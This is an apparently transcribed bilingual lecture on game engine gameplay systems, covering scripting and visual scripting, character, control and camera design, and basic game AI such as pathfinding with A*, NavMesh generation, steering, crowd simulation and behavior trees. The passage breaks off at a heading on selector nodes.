      针对某些特定逻辑进行快速迭代

    • Enable to fix bugs in script while game is online

      允许在游戏在线时修复脚本中的错误

    A troublesome problem with hot update

    ​热更新的一个麻烦问题

    • All variables reference to old functions shouldbe updated too

      所有引用旧函数的变量也应更新

    webp

    Issues with Script Language

    ​脚本语言的问题

    The performance is usually lower than compiled language

    ​性能通常低于编译型语言

    • Weakly typed language is usually harder to optimize when compile

      弱类型语言在编译时通常更难优化

    • Need a virtual machine to run the bytecode

      需要虚拟机来运行字节码

    • JIT is a solution for optimization

      JIT 是优化的解决方案

    ​Weakly typed language is usually harder to refactor

    ​弱类型语言通常更难重构

    webp

    Make a Right Choice of Scripting Language

    ​正确选择脚本语言

    Things need to be considered

    ​需要考虑的事项

    • Language performance

      语言性能

    • Built-in features, e.g. object-oriented programming support

      内置功能,例如面向对象编程支持

    Select the proper architecture of scripting

    ​选择合适的脚本架构

    • Object lifetime management in native engine code or script

      本机引擎代码或脚本中的对象生命周期管理

    • Which one is dominant, native language or script

      本机语言或脚本哪个占主导地位

    ​热门脚本语言 (1/2)

    Lua (used in World of Warcraft, Civilization V)

    ​Lua(用于《魔兽世界》、《文明 5》)

    • Robust and mature

      强大且成熟

    • Excellent runtime performance

      出色的运行时性能

    • Light-weighted and highly extensible

      轻量且高度可扩展

    Python (used in The Sims 4, EVE Online)

    ​Python(用于《模拟人生 4》、《星战前夜》)

    • Reflection support

      反射支持

    • Built-in object-oriented support

      内置面向对象支持

    • Extensive standard libraries and third-party modules

      广泛的标准库和第三方模块

    C# (to bytecode offline, used in Unity)

    ​C#(离线字节码,用于 Unity)

    • Low learning curve, easy to read and understand

      学习难度低,易于阅读和理解

    • Built-in object-oriented support

      内置面向对象支持

    • Great community with lots of active developers

      拥有大量活跃开发人员的优秀社区

    webp

    Visual Scripting

    ​可视化脚本

    Why We Need Visual Scripting

    ​为什么我们需要可视化脚本

    • Friendly to non-programmers, especially designers and artists

      对非程序员,尤其是设计师和艺术家来说很友好

    • Less error-prone with drag-drop operations instead of code writing

      使用拖放操作代替代码编写,更不容易出错

    webp

    Visual Script is a Program Language

    ​Visual Script 是一种程序语言

    Visual script is also a programming language, which usually needs

    ​Visual Script 也是一种编程语言,通常需要

    • Variable

      变量

    • Statement and Expression

      语句和表达式

    • Control Flow

      控制流

    • Function

      函数

    • Class (for object-oriented programming language)

      类(用于面向对象编程语言)

    webp

    Variable

    ​变量

    Preserve the data to be processed or output

    ​保存要处理或输出的数据

    • Type

      类型

      • Basic type, e.g. integer, floating

        基本类型,例如整数、浮点数

      • Complex type, e.g.structure

        复杂类型,例如结构体

    • Scope

      作用域

      • Local variable

        局部变量

      • Member variable

        成员变量

    webp

    Variable Visualization - Data Pin and Wire

    ​变量可视化 - 数据引脚和数据线

    Use data wires through data pins to pass variables (parameters)

    ​通过数据引脚使用数据线传递变量(参数)

    • Each data type uses a unique pin color

      每种数据类型都使用独特的引脚颜色

    webp

    Statement and Expression

    ​语句和表达式

    Control how to process data

    ​控制如何处理数据

    • Statement: expresses some action to be carried out

      语句:表达要执行的某些操作

      • Assignment Statement

        赋值语句

      • Function Statement

        函数语句

    • Expression: to be evaluated to determine its value

      表达式:要进行求值以确定其值

      • Function Expression

        函数表达式

      • Math Expression

        数学表达式

    webp

    Statement and Expression Visualization - Node

    ​语句和表达式可视化 - 节点

    Use nodes to represent statements and expressions

    ​使用节点表示语句表达式

    • Statement Node

      语句节点

    • Expression Node

      表达式节点

    webp

    Control Flow

    ​控制流

    Control the statement execution order

    ​控制语句的执行顺序

    • Sequence

      顺序

      • By default statements are executed one by one

        默认情况下,语句会逐个执行

    • Conditional

      条件

      • Next statement is decided by a condition

        下一个语句由条件决定

    • Loop

      循环

      • Statements are executed iteratively until thecondition is not true

        语句会迭代执行,直到条件不成立

    webp

    Control Flow Visualization -Execution Pin and Wire

    ​控制流可视化 - 执行引脚和连线

    Use execution wires through execution pins to make statements sequence

    ​使用执行连线通过执行引脚来制作语句序列

    • Use control statement nodes to make different control flow

      使用控制语句节点来制作不同的控制流

    webp

    Function

    ​函数

    A logic module which take in data, process it and return result(s)

    ​接收数据、处理数据并返回结果的逻辑模块

    • Input Parameter

      输入参数

      • The data required input to be processed

        需要输入以进行处理的数据

    • Function Body

      函数主体

      • Control how to process data

        控制如何处理数据

    • Return value(s)

      返回值

      • The data to be returned

        要返回的数据

    webp

    Function Visualization -Function Graph

    ​函数可视化 - 函数图

    Use a graph with connected nodes to make a function

    ​使用带有连接节点的来制作函数

    webp

    Class

    ​类

    A prototype for a kind of objects

    ​一种对象的原型

    • Member Variable

      成员变量

      • The lifetime is managed by the object instance

        生命周期由对象实例管理

    • Member Function

      成员函数

      • Can access member variables directly

        可以直接访问成员变量

      • Maybe overrided by derived classes

        可能被派生类覆盖

    webp

    Class Visualization -Blueprint

    ​类可视化 - 蓝图

    Use blueprint to define a class that inherits from a native class

    ​使用蓝图定义从本机类继承的类

    • Event Callback Functions

      事件回调函数

    • Member Functions

      成员函数

    • Member Variables

      成员变量

    webp

    Make Graph User Friendly

    ​使图表更方便用户使用

    • Fuzzy finding

      模糊查找

    • Accurate suggestions by type

      按类型提供准确建议

    Visual Script Debugger

    ​可视化脚本调试器

    Debug is an important step among development

    ​调试是开发过程中的重要步骤

    Provide user-friendly debug tools for visual scripting

    ​为可视化脚本提供用户友好的调试工具

    webp

    Issues with Visual Scriping (1/2)

    ​可视化脚本问题 (1/2)

    Visual script is hard to merge for a team work

    ​可视化脚本很难在团队合作中合并

    • Usually a visual script is stored as a binary file

      通常,可视化脚本以二进制文件形式存储

    • Manually reorder script graph is inefficient and error-prone even with a merge tool

      即使使用合并工具,手动重新排序脚本图也效率低下且容易出错

    webp

    Issues with Visual Scripting (2/2)

    The graph can get pretty messy with complex logic

    ​图表可能因逻辑复杂而变得相当混乱

    • Need uniform graph layout rules for a team work

      团队合作需要统一的图表布局规则

    webp

    Script and Graph are Twins

    ​脚本和图是双胞胎

    webp

    “3C” in Game Play

    What is 3C?

    3C: Character, Control & Camera

    ​3C:角色、控制和摄像头

    3C is the primary element that determines the gameplay experience

    ​3C 是决定游戏体验的主要元素

    webp

    Character

    ​角色

    In-game character, both player and npc.

    ​游戏中的角色,包括玩家和 NPC。

    Include character movement, combat, healthmana, what skills and talents they have, etc.

    ​包括角色移动、战斗、生命值、他们拥有的技能和天赋等。

    One most basic element of a character is movement.

    ​角色最基本的元素之一是移动

    webp

    Character: Well-designed Movement

    ​角色:精心设计的动作

    Movement looks simple, but it’s hard to do well.

    ​动作看似简单,但做好却很难。

    In AAA games, every basic state of action needs to bebroken down into detailed states.

    ​在 AAA 游戏中,每个基本动作状态都需要分解为详细状态。

    webp

    Extended Character: More complex and varied states

    ​扩展角色:更加复杂多样的状态

    webp

    • Hanging

      悬挂

    • Skating

      滑冰

    • Diving

      跳水

    Extended Character: Cooperate with other systems

    ​扩展角色:与其他系统配合

    Game effects, sound, environment interaction.

    ​游戏特效、声音、环境互动。

    Extended Character: More realistic motion with Physics

    ​扩展角色:更逼真的物理运动

    • Airflow

      气流

    • Inertia tensor

      惯性张量

    • Torque

      扭矩

    webp

    Movement State Machine

    ​运动状态机

    webp

    Control

    ​控制

    Different input device

    ​不同的输入设备

    Different game play

    ​不同的游戏玩法

    webp

    A Good Example of Control

    From Input to Game Logic

    webp

    Control: Zoom in and out

    ​控制:放大和缩小

    Control: Aim Assist

    ​控制:瞄准辅助

    webp

    ​让玩家体验更好。如果没有瞄准辅助,有可能因延迟(接受信号输入到逻辑中射弹这段时间)导致玩家无法瞄准。

    Control: Feedback

    ​控制:反馈

    webp

    ​一些地方让手柄震动。

    Control: Context Awareness

    ​控制:情境感知

    Context-sensitive controls

    ​情境敏感控制

    • The same input button produces different effects in different game scenarios

      同一输入按钮在不同的游戏场景中产生不同的效果

    webp

    Control: Chord & Key Sequences

    ​控制:和弦和按键序列

    webp

    Chords

    ​和弦

    • when pressed at the same time, produce a unique behavior in the game

      同时按下时,在游戏中产生独特的行为

    Key Sequences

    ​按键序列

    • Gesture detection is generally implemented by keeping a brief history of the HlD actions performed by the player

      手势检测通常通过保存玩家执行的 HlD 操作的简要历史记录来实现

    Camera: Subjective Feelings

    ​相机:主观感受

    webp

    Camera Basic: POV & FOV

    ​摄像机基础:POV 和 FOV

    POV (point of view)

    ​POV(视点)

    • determines the position of the player to observe

      确定玩家观察的位置

    FOV (field of view)

    ​FOV(视野)

    • determines the size of the player’s viewing Angle

      确定玩家视角的大小

    webp

    Camera Binding

    ​摄像机绑定

    Using POV and rotation to bind.

    ​使用 POV 和旋转进行绑定。

    webp

    Camera Control

    ​相机控制

    webp

    ​相机与角色的相对位置不应是完全固定。

    Camera Track

    ​相机轨迹

    webp

    Camera Effects

    ​相机特效

    Provide the camera with more post-visual effects, such as filters and shake.

    ​为相机提供更多后期视觉效果,如滤镜和抖动。

    webp

    Many Cameras: Camera Manager

    ​多个摄像机:相机管理

    Camera: Subjective Feelings

    ​相机:主观感受

    Complex effects are often achieved by multiple base adjustments. To create a sense of speed as an example, we can do:

    ​复杂的效果往往需要通过多次基础调整来实现。以营造速度感为例,我们可以这样做:

    • Add lines in the speed direction

      在速度方向上添加线条

    • The character falls backwards

      角色向后倒下

    • The dynamic fuzzy

      动态模糊

    • Zoom in FOV (to speed up changes in screen content)

      放大 FOV(以加快屏幕内容的变化)

    loose feeling

    ​放松的感觉

    • Relax camera movement

      放松镜头运动

    webp

    Cinematic

    ​电影

    • filter, motion, sound, narrator, model, animation, camera movement, …

      滤镜、动作、声音、旁白、模型、动画、镜头运动……

    webp

    Camera

    ​相机

    For artists and designers to optimize the effect:

    ​供艺术家和设计师优化效果:

    • Inheritable classes

      可继承的类

    • Function that can be accessed by Blueprint

      蓝图可访问的函数

    • Adjustable parameters

      可调整的参数

    webp

    Everything is Gameplay.

    References

    Event Mechanism

    Script

    Visual Scripting

    Gameplay and 3C

    第十六节:游戏引擎 Gameplay 玩法系统:基础 AI

    Basic Artificial Intelligence

    ​基础人工智能

    Outline of Artificial intelligence Systems

    ​人工智能系统概述

    Al Basic

    ​人工智能基础

    • Navigation

      导航

    • Steering

      转向

    • Crowd Simulation

      人群模拟

    • Sensing

      感知

    • Classic Decision Making Algorithms

      经典决策算法

    Advanced Al

    ​高级人工智能

    • Planning and Goals

      规划和目标

    • Machine Learning

      机器学习

    ​导航

    ​游戏中的导航

    Find paths from a location to another in an automatic manner

    ​自动查找从一个位置到另一个位置的路径

    webp

    ​导航三步骤

    webp

    • Map representation

      地图表示

    • Path finding

      路径查找

    • Path smoothing

      路径平滑

    Map Representations - Walkable Area

    ​地图表示 - 可行走区域

    • We need to tell Al agents where they can walk - Walkable area

      我们需要告诉人工智能代理他们可以走到哪里 - 可行走区域

    • Walkable area of players is determined by character motion capabilities

      玩家的可行走区域由角色运动能力决定

      • Physical Collision

        物理碰撞

      • Climbing slope/height

        爬坡/高度

      • Jumping distance

        跳跃距离

    • Simulating movement of Al agents as players costs too much

      模拟人工智能代理作为玩家的移动成本太高

    • Al agents are still expected to have the same walkable area as players

      人工智能代理仍然需要与玩家拥有相同的可行走区域

    Map Representations - Formats

    ​地图表示 - 格式

    • Waypoint Network

      航点网络

    • Grid

      网格

    • Navigation Mesh

      导航网格

    • Sparse Voxel Octree

      稀疏体素八叉树

    Waypoint Network

    ​航点网络

    • Network connecting critical points (waypoints) from the map

      连接地图上关键点(航点)的网络

    • Waypoint sources:

      航点来源:

      • Designed important locations(下图中红点

        设计重要位置

      • Corner points to cover walkable area(下图中绿点

        角点覆盖可步行区域

      • Internal points to connect near-by waypointsadding flexibility to navigation(下图中蓝点

        内部点连接附近的航点,为导航增添灵活性

    webp

    ​魔兽争霸就使用了航点网络。

    Usage of waypoint network is similar to subway system

    ​航点网络的使用方式与地铁系统类似

    • Find the nearest points to get on and off the network

      查找最近的上下车点

    • Plan the path on the waypoint network

      规划航点网络上的路径

    webp

    Pros:

    ​优点:

    • Easy to implement

      易于实施

    • Fast path finding, even for large maps

      路径查找速度快,即使对于大型地图也是如此

    Cons:

    ​缺点:

    • Limited flexibility: must go to the nearest point inthe network before navigation

      灵活性有限:导航前必须前往网络中的最近点

    • Waypoint selection requires manual intervention

      航点选择需要人工干预

    webp

    Grid

    ​网格

    • Intuitive discretization of map

      直观的地图离散化

    • Uniform subdivision into small regular grid shapes

      均匀细分为小的规则网格形状

    • Common grid shapes

      常见的网格形状

      • Square

        正方形

      • Triangle

        三角形

      • Hexagon

        六边形

    webp

    ​像文明五这样的六边形网格不易在内存中分配存储空间。

    Grid property could be modified in runtime to reflect dynamic environmental changes

    ​可以在运行时修改网格属性以反映动态环境变化

    webp

    Pros:

    ​优点:

    • Easy to implement

      易于实现

    • Uniform data structure

      统一的数据结构

    • Dynamic

      动态

    Cons:

    ​缺点:

    • Accuracy depends on grid resolution

      精度取决于网格分辨率

    • Dense grid lowers pathfinding performance

      密集的网格会降低寻路性能

    • High memory consumption

      内存消耗高

    • Hard to handle 3D map

      难以处理 3D 地图

    webp

    ​导航网络难以处理 3D 地图。

    ​导航网格 (NavMesh)

    • Solves the problem of representing overlapped walkable areas

      解决表示重叠可行走区域的问题

    • Approximates the walkable area of character controller based on physical collision and motion capabilities

      根据物理碰撞和运动能力估计角色控制器的可行走区域

    • Lowers network density to boost pathfinding performance

      降低网络密度以提高寻路性能

    webp

    ​NavMesh 示例

    Neighboring 3D convex polygons to represent walkable areas

    ​相邻的 3D 凸多边形表示可行走区域

    webp

    Convex Polygon of NavMesh

    ​NavMesh 的凸多边形

    Why convex polygon?

    ​为什么是凸多边形?

    • Pathfinding generates a series of polygon (Polygon Corridor) need to walk through

      寻路会生成一系列需要穿过的多边形(多边形走廊

    • Convexity guarantees the final path is limited inthe polygon and two adjacent polygons have onlyone common edge (Portal)

      凸性保证最终路径仅限于多边形内,并且两个相邻多边形只有一个共同边(传送门

    webp

    ​NavMesh 的优缺点

    Pros:

    ​优点:

    • Support 3D walkable surface

      支持 3D 可行走表面

    • Accurate

      准确

    • Fast in pathfinding

      寻路速度快

    • Flexible for selection of start/destination

      可灵活选择起点/终点

    • Dynamic

      动态

    Cons:

    ​缺点:

    • Complex generation algorithm

      生成算法复杂

    • Not support 3D space

      不支持 3D 空间

    webp

    Sparse Voxel Octree

    ​稀疏体素八叉树

    • Represents “flyable” 3D space

      表示“可飞行”的 3D 空间

    • Similar to spatial partitioning

      类似于空间分区

    • Finest level voxels represents complicated boundary

      最精细级别的体素表示复杂边界

    • Coarser-level voxels represents uniform regions

      较粗糙级别的体素表示均匀区域

    webp

    Path Finding

    ​路径查找

    Distances in map representations can be abstracted as edge costs in graph

    ​地图表示中的距离可以抽象为图中的边成本

    webp

    webp

    ​深度优先搜索

    Expand most recently added

    ​展开最近添加的

    ​广度优先搜索

    Expand least recently added

    ​展开最近最少添加的

    Dijkstra Algorithm

    for each vertex v:
    dist[v] = ∞
    prev[v]= none
    dist[source]= 0
    set all vertices to unexplored
    while destination not explored:
    v = least-valued unexplored vertex
    set v to explored
    for each edge(v, w):
    if dist[v] + len(v,w) < dist[w]:
    dist[w]= dist[v]+ len(v, w)
    prev[W]=V

    ​总是能搜索到图中两点间最短距离。

    A Star (A*)

    • Expand lowest cost in list

      扩展列表中成本最低的元素

    • Distance is known distance from source + heuristic

      距离是距源的已知距离 + 启发式

    • Greedy: stops when reaches the goal

      贪婪:达到目标时停止

    A* - Cost calculation

    Cost calculation: $f(n) = g(n) + h(n)$

    ​成本计算:$f(n) = g(n) + h(n)$

    • $g(n)$: the exact cost of the path from the start to node $n$

      $g(n)$:从起点到节点 $n$ 的路径的准确成本

    • $h(n)$: the estimated cost from node $n$ to the goal

      $g(n)$:从起点到节点 $n$ 的路径的准确成本

    webp

    A* - Heuristic On Grids

    ​A* - 网格启发式算法

    • For 4 directions of movement, we can use Manhattan distance

      对于 4 个移动方向,我们可以使用曼哈顿距离(来计算 $g(n)$ 和 $h(n)$)

    • $D_1$: cost for moving to the adjacent node

      $D_1$:移动到相邻节点的成本

    • $h(n)=D_1\cdot(d_x+d_y)$

      • $d_x=|x_n-x_{goal}|, d_y=|y_n-y_{goal}|$

    webp

    A*- Heuristic On NavMesh

    ​A*- NavMesh 上的启发式方法

    Multiple choices when evaluating cost on NavMesh

    ​评估 NavMesh 上的成本时有多种选择

    • Using polygon centers or vertices usually over-estimate the cost

      使用多边形中心或顶点通常会高估成本

    • Using hybrid method introduces too many points to check

      使用混合方法会引入太多要检查的点

    • Midpoints of edges - a good balance

    (选用区域的)边缘的中点 - 良好的平衡

    webp

    • On a navigation mesh that allows any angle ofmovement, use a straight line distance

      在允许任意角度移动的导航网格上,使用直线距离

    • Use midpoint of the edge entering the currentnode as node cost calculation point

      使用进入当前节点的边缘中点作为节点成本计算点

    • $D$: the cost for moving unit distance in any direction

      $D$:向任意方向移动单位距离的成本

      • $h(n)=D\cdot\sqrt{d_x\cdot d_x+d_y\cdot d_y}$
      • $d_x=|x_n-x_{goal}|, d_y=|y_n-y_{goal}|$

    webp

    A*-NavMesh Walkthrough

    ​A*-NavMesh 演练

    webp

    A*- Heuristic

    ​A*- 启发式

    • $h(n)$ controls $A^*$'s behavior.

      $h(n)$ 控制 $A^*$ 的行为。

    • With 100% accurate estimates, get shortest paths quickly

      以 100% 准确的估计,快速获得最短路径

    • Too low, continue to get shortest paths, but slow down

      太低,继续获得最短路径,但速度会减慢

    • Too high, exit early without shortest pathBalance between pathfinding speed and accuracy

      太高,提前退出,没有最短路径在寻路速度和准确性之间取得平衡

    Path Smoothing

    ​路径平滑

    • Why we need path smoothing

      为什么我们需要路径平滑

      • Zigzag, many unnecessary turns

        之字形,许多不必要的转弯

    • “String Pulling”- Funnel Algorithm

      “拉线”- 漏斗算法

    webp

    Path Smoothing-Funnel Algorithm

    ​路径平滑漏斗算法

    • The scope of the funnel is the possible scope of the path

      漏斗的范围是路径的可能范围

    • Narrow the funnel if necessary to fit the portal

      必要时缩小漏斗以适应门户

    webp

    Terminate when the goal is in the funnel

    ​当目标处于漏斗中时终止

    webp

    ​NavMesh 生成-体素化

    Sample collision scene by voxelization

    ​通过体素化示例碰撞场景

    webp

    ​NavMesh 生成-区域分割

    • Calculate the distance of each voxel to border

      计算每个体素到边界的距离

    • Mark border voxels by AgentRadius to avoid clipping

      通过 AgentRadius 标记边界体素以避免剪切

    webp

    Watershed Algorithm

    ​分水岭算法

    • Gradually “flood” the “terrain”

      逐渐“淹没”“地形”

    • Form “watershed” (dividing ridge) when “pools” meet

      当“水池”相遇时形成“分水岭”(分水岭)

    webp

    Segment the “neighboring" voxels into regions to provide a good basis for polygon mesh

    ​将“相邻”体素分割成区域,为多边形网格提供良好的基础

    webp

    Regions don’t have overlapping voxels in 2D

    ​区域在 2D 中没有重叠体素

    webp

    ​NavMesh 生成-网格生成

    Generate NavMesh from segmented regions

    ​从分段区域生成 NavMesh

    webp

    ​现在有插件来实现这个。

    ​NavMesh 高级功能-多边形标记

    Useful for marking terrain types: plains, mountain, water, etc.

    ​用于标记地形类型:平原、山脉、水域等。

    • “Paint colors" to add user-defined regions

      “绘制颜色”以添加用户定义的区域

    • Polygons generated from user-defined regions have special flag

      从用户定义的区域生成的多边形具有特殊标记

    webp

    ​NavMesh 高级功能-Tile

    • Fast for responding to dynamic objects

      快速响应动态对象

    • Avoid rebuilding the entire NavMesh

      避免重建整个 NavMesh

    • TileSize - trade-off between pathfinding and dynamic rebuilding performance

      TileSize- 寻路和动态重建性能之间的权衡

    webp

    ​在游戏中,导航网络可能会发生变化。

    ​NavMesh 高级功能-网格外链接

    Allow agents to jump or teleport

    ​允许代理跳跃或传送

    webp

    Steering

    ​转向

    From Path to Motion

    ​从路径到运动

    • Cars cannot follow planned path exactly

      汽车无法完全遵循计划的路径(车辆具有转向半径)

    • Motion of cars are limited by theirs motion abilities:

      汽车的运动受到其运动能力的限制:

      • Linear acceleration (throttle/brake)

        线性加速度(油门/刹车)

      • Angular acceleration (steering force)

        角加速度(转向力)

    • Motion needs to be adjusted according to the limits

      运动需要根据限制进行调整

    webp

    Steering Behaviors

    ​转向行为

    webp

    • Seek / Flee

      寻找 / 逃跑

    • Velocity Match

      速度匹配(从起点出发加速,减速到终点停止)

    • Align

      对齐(让车头朝着某个方向)

    Seek/Flee

    ​寻找/逃跑

    Steer the agent towards / away from the target

    ​引导代理朝向/远离目标

    • Position matching in the nature

      自然中的位置匹配

    • Accelerate with max acceleration towards / away from the target

      以最大加速度朝向/远离目标加速

    • Will oscillate around the target

      会围绕目标振荡

    • Input:

      输入:

      • Self position

        自身位置

      • Target position

        目标位置

    • Output:

      输出:

      • Acceleration

        加速度

    webp

    Seek / Flee Variations

    ​寻找 / 逃离变体

    Modifying the target in runtime can generate new steering behaviors

    ​在运行时修改目标可以生成新的转向行为

    webp

    • Pursue

      追寻

    • Path Following

      路径跟随

    • Wander

      漫游

    • Flow Field Following

      流场跟随

    Velocity Match

    ​速度匹配

    Matches the target velocity

    ​匹配目标速度

    • Calculate acceleration from matching time and velocity differences

      根据匹配时间和速度差异计算加速度

    • Clamp the acceleration by maximum acceleration of agents

      通过代理的最大加速度限制加速度

    • Input:

      输入:

      • Target velocity

        目标速度

      • Self velocity

        自身速度

      • Matching time

        匹配时间

    • Output:

      输出:

      • Acceleration

        加速度

    Align

    ​对齐

    Matches target orientation

    ​匹配目标方向

    • Input:

      输入:

      • Target orientation

        目标方向

      • Self orientation

        自我定位

    • Output:

      输出:

      • Angular acceleration

        角加速度

    webp

    Crowd Simulation

    ​人群模拟

    Crowd

    ​人群

    A large group of individuals share information in the same environment alone or in a group

    ​一大群人单独或成群地在同一环境中分享信息

    • Collision avoidance

      避免碰撞

    • Swarming

      蜂拥

    • Motion in formation

      形成队列运动

    webp

    Crowd Simulation Models

    ​人群模拟模型

    • Started from “Boids” system of Reynolds

      从雷诺的 “Boids” 系统开始

    • Three families of models:

      三个模型系列:

      • Microscopic models

        微观模型

        • “Bottom-Up”

          “自下而上”

        • Focus on individuals

          关注个体

      • Macroscopic models

        宏观模型

        • Crowd as a unified and continuous entity

          人群作为一个统一且连续的实体

      • Mesoscopic models

        中观模型

        • Divide the crowd into groups

          将人群分成几组

    Microscopic Models-Rule-based Models

    ​微观模型-基于规则的模型

    Flock dynamics of animal crowds as an emergent behavior by modeling motion of each individuals with simple predefined rules:

    ​通过使用简单的预定义规则对每个个体的运动进行建模,将动物群体的群体动态视为一种突发行为:

    • Separation: to steer away from all of its neighbors

      分离:远离所有邻居

    • Cohesion: to steer towards the “center of mass”

      凝聚:转向“重心”

    • Alignment: to line up with agents close by

      对齐:与附近的代理对齐

    webp

    • Separation

      分离

    • Cohesion

      凝聚

    • Alignment

      对齐

    webp

    Easy to implement, but not suitable to simulate complex behavior rules.

    ​易于实现,但不适合模拟复杂的行为规则。

    Macroscopic Models

    ​宏观模型

    Simulate crowd motion from a macro perspective

    ​从宏观角度模拟人群运动

    • Treat the crowd as a unified and continuous entity

      将人群视为统一且连续的实体(避免逐个计算影响性能)

    • Control motions with potential field or fluid dynamics

      用势场或流体动力学控制运动

    • Does not consider interactions between individualsand the environment in individual level

      不考虑个体与环境在个体层面上的相互作用

    webp

    Mesoscopic Models

    ​中观模型

    Simulate crowd motion taking care of both details and the whole

    ​模拟人群运动,兼顾细节和整体

    • Divide the crowd into groups

      将人群分成几组

    • Deals with interactions between groups and individuals in each group

      处理群体之间以及每个群体中个人之间的互动

    • combinations of microscopic models and formation rules or psychological models

      微观模型与形成规则或心理模型的组合

    webp

    Collision Avoidance-Force-based Models

    ​基于防撞力的模型

    • A mixture of socio-psychological and physical forces influencing the behavior in a crowd

      影响人群行为的社会心理和物理力量的混合

    • The actual movement of an individual depends on the desired velocity and its interaction with the environment

      个人的实际运动取决于所需速度及其与环境的相互作用

    • Can simulate dynamical features of escape crowd panic

      可以模拟逃离人群恐慌的动态特征

    webp

    Pros:

    ​优点:

    • can be extended to simulate more emergent behaviors of human crowds

      可以扩展以模拟更多人群突发行为

    Cons:

    ​缺点:

    • Similar to physics simulation, simulation step should be small enough

      与物理模拟类似,模拟步骤应该足够小

    webp

    Collision Avoidance-Velocity-based models

    ​碰撞避免-基于速度的模型

    Consider the neighbor information to make decisions in velocity space

    ​考虑邻居信息以在速度空间中做出决策

    • able to simulate in local space

      能够在局部空间中进行模拟

    • applied to collision avoidance

      应用于碰撞避免

    Reciprocal Velocity obstacle methods-Current standard collision avoidance algorithms

    ​相互速度障碍方法-当前标准碰撞避免算法

    • Velocity Obstacle (VO)

      速度障碍 (VO)

    • Reciprocal Velocity Obstacle (RVO)

      相互速度障碍 (RVO)

    • Optimal Reciprocal Collision Avoidance (ORCA)

      最佳相互碰撞避免 (ORCA)

    webp

    Velocity obstacle (VO)

    ​速度障碍 (VO)

    • Calculate its own dodge velocity, assuming other agent is unresponsive

      假设其他代理没有响应,计算自己的躲避速度

    • Appropriate for static and unresponsive obstacles

      适用于静态和无响应的障碍物

    • Overshoot

      超调

    • Causes oscillation between two agents attempting to avoid each other

      导致两个试图相互避开的代理之间发生振荡

    webp

    Reciprocal Velocity Obstacle (RVO)

    ​相互速度障碍 (RVO)

    • Assuming the other agent is using the same decision process (mutually cooperating)

      假设其他代理使用相同的决策过程(相互合作)

    • Both sides move half way out of the way ofa collision

      双方都向半路移动以避免碰撞

    • Only guarantees no oscillation and avoidance for two agents

      仅保证两个代理不会发生振荡和避免碰撞

    Optimal Reciprocal Collision Avoidance (ORCA)

    ​最佳相互碰撞避免 (ORCA)

    webp

    Sensing

    ​传感

    Sensing or Perception

    ​传感或感知

    webp

    Internal Information

    ​内部信息

    • Information of the agent itself

      agent 本身的信息

      • Position

        位置

      • HP

        生命值

      • Armor status

        护甲状态

      • Buff status

        增益状态

    • Can be accessed freely

      可自由访问

    Static Spatial information

    ​静态空间信息

    webp

    • Navigation Data

      导航数据

    • Tactical Map

      战术地图

    • Smart Object

      智能对象

    • Cover Point

      掩护点

    Dynamic Spatial information (1/2) - influence Map

    ​动态空间信息(1/2)- 影响力地图

    webp

    Dynamic Spatial Information (2/2) - Game Objects

    ​动态空间信息 (2/2) - 游戏对象

    • Information being sensed from a character

      从角色感知到的信息

    • Multiple character information can exist for a single character as it can be sensed by multiple agents

      单个角色可以存在多个角色信息,因为它可以被多个代理感知

    • Usually contains:

      通常包含:

      • Game Object lD

        游戏对象 ID

      • Visibility

        可见性

      • Last Sensed Method

        最后感知的方法

      • Last Sensed Position

        最后感知的位置

    Sensing Simulation

    ​传感模拟

    • Light, sound, and odor travels in space

      光、声音和气味在空间中传播

    • Have max traveling range

      具有最大传播范围

    • Attenuates in space and time with different patterns

      以不同的模式在空间和时间中衰减

      • Sight is blocked by obstacles

        视线被障碍物阻挡

      • Smelling ranges shrinks over time

        嗅觉范围随时间缩小

    • Radiating field can simulate sensing signals

      辐射场可以模拟传感信号

      • Can be simplified as Influence Map

        可以简化为影响图

      • Agents covered by the field can sense the information

        场覆盖的代理可以感知信息

    webp

    Classic Decision Making Algorithms

    ​经典决策算法

    Decision Making Algorithms

    ​决策算法

    • Finite State Machine

      有限状态机

    • Behavior Tree

      行为树

    • Hierarchical Tasks Network

      分层任务网络

    • Goal Oriented Action Planning

      目标导向行动规划

    • Monte Carlo Tree Search

      蒙特卡洛树搜索

    • Deep Learning

      深度学习

    Finite State Machine

    ​有限状态机

    • Change from one State to another according to some Conditions

      根据某些条件从一个状态变为另一个状态

    • The change from one state to another is called a Transition

      从一个状态到另一个状态的改变称为转换

    webp

    webp

    ​游戏 AI 经典案例——吃豆人。

    Finite State Machine - Pros & Cons

    ​有限状态机 - 优点和缺点

    Pros:

    ​优点:

    • Easy to implement

      易于实现

    • Easy to understand

      易于理解

    • Very fast to deal with simple case

      处理简单情况非常快

    Cons:

    ​缺点:

    • Maintainability is bad, especially add or remove state

      可维护性差,尤其是添加或删除状态

    • Reusability is bad, can’t used in other projects or characters

      可重用性差,不能用于其他项目或角色

    • Scalability is bad, hard to modify for complicated case

      可扩展性差,复杂情况下难以修改

    webp

    Hierarchical Finite State Machine (HFSM)

    ​分层有限状态机 (HFSM)

    Tradeoff between reactivity and modularity

    ​反应性和模块化之间的权衡

    • Reactivity: the ability to quickly and efficiently react to changes

      反应性:快速高效地对变化做出反应的能力

    • Modularity: the degree to which a system’s components may be separated into building blocks, and recombined

      模块化:系统组件可分离成构建块并重新组合的程度

    webp

    Behavior Tree (BT)

    Behavior Tree

    Focus on state abstraction and transition conditions

    ​关注状态抽象和转换条件

    webp

    Similar to human thinking:

    ​类似于人类的思维:

    • If ghost close, run away

      如果鬼靠近,就逃跑

    • But if I’m powerful, chase it

      但如果我很强大,就去追它

    • Otherwise, eating

      否则,就吃

    webp

    Behavior Tree - Execution Nodes

    ​行为树 - 执行节点

    Execution node (leaf node)

    ​执行节点(叶节点)

    • Condition node

      条件节点

    • Action node

      动作节点

    webp

    Behavior Tree - Control Nodes

    ​行为树-控制节点

    Control flow node (internal node)

    ​控制流节点(内部节点)

    • Control flow determined by the return value of child nodes

      控制流由子节点的返回值决定

    • Each node has a return value which is success failure or running

      每个节点都有一个返回值,即成功、失败或正在运行

    webp

    Control Node-Sequence (1/2)

    ​控制节点顺序 (1/2)

    • Order

      顺序

      • Execute children from left to right

        从左到右执行子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • until one child returns Failure or Running then return value accordingly

        直到一个子节点返回失败或正在运行,然后相应地返回值

      • or all children return Success, then return Success

        或所有子节点都返回成功,然后返回成功

    • lf Stop and Return Running

      如果停止并返回正在运行

      • the next execution will start from the running action

        下一次执行将从正在运行的操作开始

    webp

    Control Node-Sequence (2/2)

    Sequence

    ​序列

    • Allows designers to make a “plan”

      允许设计师制定“计划”

    webp

    Control Node-Selector (1/2)

